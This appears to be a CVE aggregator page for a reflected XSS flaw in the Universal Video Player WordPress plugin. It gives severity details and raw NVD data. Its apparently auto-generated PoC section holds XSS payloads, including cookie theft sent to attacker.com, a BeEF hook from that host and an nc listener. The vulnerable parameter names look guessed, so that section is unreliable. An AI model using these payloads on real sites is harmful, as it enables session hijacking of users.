Security Vulnerability Report
中文
CVE-2025-69053 CVSS 7.1 HIGH

CVE-2025-69053

Published: 2026-01-22 17:16:19
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Universal Video Player universal-video-player allows Reflected XSS.This issue affects Universal Video Player: from n/a through <= 3.8.4.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Universal Video Player <= 3.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69053 PoC: Reflected XSS in Universal Video Player --> <!-- Target: LambertGroup Universal Video Player <= 3.8.4 --> <!-- Author: Generated for security analysis --> <!-- PoC 1: Basic XSS Alert --> <!-- 1. Construct malicious URL with XSS payload in vulnerable parameter 2. Example: http://target-site.com/?video_id=<script>alert('XSS')</script> 3. Send this URL to victim via social engineering 4. When victim clicks the link, XSS payload executes in their browser --> <!-- PoC 2: Cookie Stealing --> <!-- 1. Attacker sets up listener: nc -lvp 8080 2. Craft URL: http://target-site.com/?video_id=<script>document.location='http://attacker.com/steal?c='+document.cookie</script> 3. When victim visits crafted URL, their cookies are sent to attacker --> <!-- PoC 3: Session Hijacking --> <!-- 1. Use BeEF or similar framework to create payload 2. Inject: <script src='http://attacker.com/hook.js'></script> 3. Victim's browser becomes controlled by attacker --> <!-- Example malicious URL --> <!-- http://vulnerable-site.com/wp-content/plugins/universal-video-player/?vid=<img src=x onerror=alert(document.domain)> --> <!-- Mitigation: Upgrade to patched version, implement input validation and output encoding -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69053", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:18.863", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Universal Video Player universal-video-player allows Reflected XSS.This issue affects Universal Video Player: from n/a through <= 3.8.4."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en LambertGroup Universal Video Player universal-video-player permite XSS Reflejado. Este problema afecta a Universal Video Player: desde n/a hasta &lt;= 3.8.4."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/universal-video-player/vulnerability/wordpress-universal-video-player-plugin-3-8-4-reflected-cross-site-scripting-xss-vulnerability-2?_s_id=cve", "source": "[email protected]"}]}}